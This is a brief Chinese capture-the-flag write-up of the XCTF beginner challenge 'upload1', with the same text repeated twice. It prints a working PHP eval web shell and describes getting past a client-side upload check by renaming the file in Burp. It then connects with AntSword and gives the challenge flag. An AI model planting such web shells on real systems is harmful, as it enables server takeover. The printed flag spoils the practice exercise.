攻防世界WEB(新手模式)2-2-upload1
进到靶场是一个平平无奇的文件上传界面
那么直接就是一句话木马上传,先试探一下可以上传的类型
<?php @eval($_POST['ddkx']); ?>上传按钮失效,并提示只能上传图片,说明js对上传文件进行了校验
使用bp抓包修改,把后缀改成php,就上传成功了
注意拼接url路径,连接蚁剑
连接成功后,这个路径查看到flag
cyberpeace{7c1fc27779aa2531ac6f58b295ba0e23}
进到靶场是一个平平无奇的文件上传界面
那么直接就是一句话木马上传,先试探一下可以上传的类型
<?php @eval($_POST['ddkx']); ?>上传按钮失效,并提示只能上传图片,说明js对上传文件进行了校验
使用bp抓包修改,把后缀改成php,就上传成功了
注意拼接url路径,连接蚁剑
连接成功后,这个路径查看到flag
cyberpeace{7c1fc27779aa2531ac6f58b295ba0e23}